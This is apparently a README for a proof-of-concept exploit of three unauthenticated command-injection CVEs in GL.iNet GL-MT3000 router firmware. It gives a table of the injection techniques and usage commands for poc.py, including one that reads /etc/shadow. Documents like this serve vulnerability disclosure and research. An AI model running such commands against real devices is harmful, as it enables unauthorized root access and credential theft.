
إثبات مفهوم لثلاث ثغرات حقن أوامر غير مصادَق عليها (CVE-2026-11450, CVE-2026-11451, CVE-2026-11452) في البرنامج الثابت لراوتر السفر GL.iNet GL-MT3000 (Beryl AX) حتى الإصدار 4.4.5.
الشرح الكامل: https://www.hunt-benito.com/blog/glinet-beryl-ax-triple-rce-cve-2026-11450-11451-11452-unauthenticated-root-on-travel-router/
| CVE | CVSS | التقنية |
|---|---|---|
| CVE-2026-11450 | 7.3 | عدم تطابق حجم المخزن المؤقت (0x40 مقابل 0x100) يتجاوز بوابة access()، ويتم حقن $() عبر system() |
| CVE-2026-11451 | 7.3 | الهروب بعلامة اقتباس مفردة في معامل media_dir الخاص بـ FTP يكسر اقتباس الصدفة |
| CVE-2026-11452 | 7.3 | استبدال أوامر $() في معامل كلمة مرور Samba داخل printf مُحاط بعلامتي اقتباس مزدوجتين |
تستغل الثلاثة جميعها موزّع CGI غير المصادَق عليه /cgi-bin/glc الذي يحمّل الإضافات عبر dlopen/dlsym دون مصادقة أو قائمة سماح بالطرق.
# Exploit all three CVEs
python3 poc.py http://192.168.8.1
# Exploit a specific CVE
python3 poc.py http://192.168.8.1 -c "id" -v 11450
python3 poc.py https://192.168.8.1 -c "id" -v 11451
python3 poc.py https://192.168.8.1 -c "id" -v 11452
# Custom command and output file
python3 poc.py http://192.168.8.1 -c "cat /etc/shadow" -o /tmp/pwned
لأغراض تعليمية وبحوث أمنية مصرّح بها فقط. لا تستخدمه ضد أنظمة لا تملكها أو لا تملك إذنًا صريحًا لاختبارها.